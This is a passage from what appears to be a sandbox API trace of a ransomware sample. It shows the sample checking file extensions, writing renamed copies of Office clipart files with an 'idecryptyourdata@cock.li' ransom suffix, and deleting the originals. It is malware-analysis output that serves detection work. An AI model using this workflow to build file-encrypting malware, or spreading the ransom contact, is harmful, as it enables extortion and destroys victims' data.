returned 4 [0184.166] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.166] lstrlenW (lpString=".xlsx") returned 5 [0184.166] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.166] lstrlenW (lpString=".ppt") returned 4 [0184.166] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.166] lstrlenW (lpString=".zip") returned 4 [0184.166] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.166] lstrlenW (lpString=".rar") returned 4 [0184.166] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.166] lstrlenW (lpString=".bz2") returned 4 [0184.166] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.166] lstrlenW (lpString=".7z") returned 3 [0184.166] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.166] lstrlenW (lpString=".dbf") returned 4 [0184.166] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.166] lstrlenW (lpString=".1cd") returned 4 [0184.166] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.166] lstrlenW (lpString=".jpg") returned 4 [0184.166] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.166] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.166] lstrlenW (lpString="J0107458.WMF") returned 12 [0184.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.167] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=3568) returned 1 [0184.167] CloseHandle (hObject=0x378) returned 1 [0184.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf")) returned 0x220 [0184.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.168] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.168] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.168] GetLastError () returned 0x0 [0184.168] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xdf0, lpOverlapped=0x0) returned 1 [0184.469] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xe00, lpOverlapped=0x0) returned 1 [0184.470] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.470] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.471] SetEndOfFile (hFile=0x37c) returned 1 [0184.471] CloseHandle (hObject=0x37c) returned 1 [0184.471] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.471] SetEndOfFile (hFile=0x378) returned 1 [0184.472] CloseHandle (hObject=0x378) returned 1 [0184.472] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.472] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf")) returned 1 [0184.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.478] lstrlenW (lpString=".doc") returned 4 [0184.478] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.478] lstrlenW (lpString=".docx") returned 5 [0184.478] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.478] lstrlenW (lpString=".pdf") returned 4 [0184.478] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.478] lstrlenW (lpString=".xls") returned 4 [0184.478] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.478] lstrlenW (lpString=".xlsx") returned 5 [0184.478] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.478] lstrlenW (lpString=".ppt") returned 4 [0184.478] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.478] lstrlenW (lpString=".zip") returned 4 [0184.479] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.479] lstrlenW (lpString=".rar") returned 4 [0184.479] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.479] lstrlenW (lpString=".bz2") returned 4 [0184.479] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.479] lstrlenW (lpString=".7z") returned 3 [0184.479] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.479] lstrlenW (lpString=".dbf") returned 4 [0184.479] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.479] lstrlenW (lpString=".1cd") returned 4 [0184.479] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.479] lstrlenW (lpString=".jpg") returned 4 [0184.479] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.479] lstrlenW (lpString=".doc") returned 4 [0184.479] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.479] lstrlenW (lpString=".docx") returned 5 [0184.479] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.479] lstrlenW (lpString=".pdf") returned 4 [0184.479] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.479] lstrlenW (lpString=".xls") returned 4 [0184.479] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.479] lstrlenW (lpString=".xlsx") returned 5 [0184.479] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.480] lstrlenW (lpString=".ppt") returned 4 [0184.480] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.480] lstrlenW (lpString=".zip") returned 4 [0184.480] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.480] lstrlenW (lpString=".rar") returned 4 [0184.480] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.480] lstrlenW (lpString=".bz2") returned 4 [0184.480] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.480] lstrlenW (lpString=".7z") returned 3 [0184.480] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.480] lstrlenW (lpString=".dbf") returned 4 [0184.480] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.480] lstrlenW (lpString=".1cd") returned 4 [0184.480] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 68 [0184.480] lstrlenW (lpString=".jpg") returned 4 [0184.480] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.480] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.480] lstrlenW (lpString="J0107500.WMF") returned 12 [0184.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.481] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=4200) returned 1 [0184.481] CloseHandle (hObject=0x378) returned 1 [0184.481] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf")) returned 0x220 [0184.481] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.482] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.482] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.483] GetLastError () returned 0x0 [0184.483] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1068, lpOverlapped=0x0) returned 1 [0184.487] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1070, lpOverlapped=0x0) returned 1 [0184.488] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.488] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.489] SetEndOfFile (hFile=0x37c) returned 1 [0184.489] CloseHandle (hObject=0x37c) returned 1 [0184.489] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.489] SetEndOfFile (hFile=0x378) returned 1 [0184.490] CloseHandle (hObject=0x378) returned 1 [0184.490] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.490] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf")) returned 1 [0184.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.491] lstrlenW (lpString=".doc") returned 4 [0184.491] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.491] lstrlenW (lpString=".docx") returned 5 [0184.491] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0184.491] lstrlenW (lpString=".pdf") returned 4 [0184.491] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.491] lstrlenW (lpString=".xls") returned 4 [0184.491] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.491] lstrlenW (lpString=".xlsx") returned 5 [0184.491] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0184.491] lstrlenW (lpString=".ppt") returned 4 [0184.491] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.491] lstrlenW (lpString=".zip") returned 4 [0184.491] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.491] lstrlenW (lpString=".rar") returned 4 [0184.491] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.491] lstrlenW (lpString=".bz2") returned 4 [0184.491] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.491] lstrlenW (lpString=".7z") returned 3 [0184.491] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.491] lstrlenW (lpString=".dbf") returned 4 [0184.492] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.492] lstrlenW (lpString=".1cd") returned 4 [0184.492] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.492] lstrlenW (lpString=".jpg") returned 4 [0184.492] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.492] lstrlenW (lpString=".doc") returned 4 [0184.492] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.492] lstrlenW (lpString=".docx") returned 5 [0184.492] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0184.492] lstrlenW (lpString=".pdf") returned 4 [0184.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.492] lstrlenW (lpString=".xls") returned 4 [0184.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.492] lstrlenW (lpString=".xlsx") returned 5 [0184.492] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0184.492] lstrlenW (lpString=".ppt") returned 4 [0184.492] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.492] lstrlenW (lpString=".zip") returned 4 [0184.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.492] lstrlenW (lpString=".rar") returned 4 [0184.492] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.492] lstrlenW (lpString=".bz2") returned 4 [0184.492] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.492] lstrlenW (lpString=".7z") returned 3 [0184.493] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.493] lstrlenW (lpString=".dbf") returned 4 [0184.493] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.493] lstrlenW (lpString=".1cd") returned 4 [0184.493] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 68 [0184.493] lstrlenW (lpString=".jpg") returned 4 [0184.493] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.493] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.493] lstrlenW (lpString="J0107502.WMF") returned 12 [0184.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.494] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=10836) returned 1 [0184.494] CloseHandle (hObject=0x378) returned 1 [0184.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf")) returned 0x220 [0184.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.494] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.494] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.495] GetLastError () returned 0x0 [0184.495] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x2a54, lpOverlapped=0x0) returned 1 [0184.805] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x2a60, lpOverlapped=0x0) returned 1 [0184.806] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.806] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.806] SetEndOfFile (hFile=0x37c) returned 1 [0184.807] CloseHandle (hObject=0x37c) returned 1 [0184.807] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.807] SetEndOfFile (hFile=0x378) returned 1 [0184.809] CloseHandle (hObject=0x378) returned 1 [0184.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.810] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf")) returned 1 [0184.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.810] lstrlenW (lpString=".doc") returned 4 [0184.810] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.810] lstrlenW (lpString=".docx") returned 5 [0184.810] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.810] lstrlenW (lpString=".pdf") returned 4 [0184.810] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.810] lstrlenW (lpString=".xls") returned 4 [0184.810] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.810] lstrlenW (lpString=".xlsx") returned 5 [0184.810] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.811] lstrlenW (lpString=".ppt") returned 4 [0184.811] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.811] lstrlenW (lpString=".zip") returned 4 [0184.811] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.811] lstrlenW (lpString=".rar") returned 4 [0184.811] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.811] lstrlenW (lpString=".bz2") returned 4 [0184.811] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.811] lstrlenW (lpString=".7z") returned 3 [0184.811] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.811] lstrlenW (lpString=".dbf") returned 4 [0184.811] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.811] lstrlenW (lpString=".1cd") returned 4 [0184.811] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.811] lstrlenW (lpString=".jpg") returned 4 [0184.811] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.811] lstrlenW (lpString=".doc") returned 4 [0184.811] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.811] lstrlenW (lpString=".docx") returned 5 [0184.811] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.811] lstrlenW (lpString=".pdf") returned 4 [0184.811] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.812] lstrlenW (lpString=".xls") returned 4 [0184.812] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.812] lstrlenW (lpString=".xlsx") returned 5 [0184.812] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.812] lstrlenW (lpString=".ppt") returned 4 [0184.812] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.812] lstrlenW (lpString=".zip") returned 4 [0184.812] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.812] lstrlenW (lpString=".rar") returned 4 [0184.812] 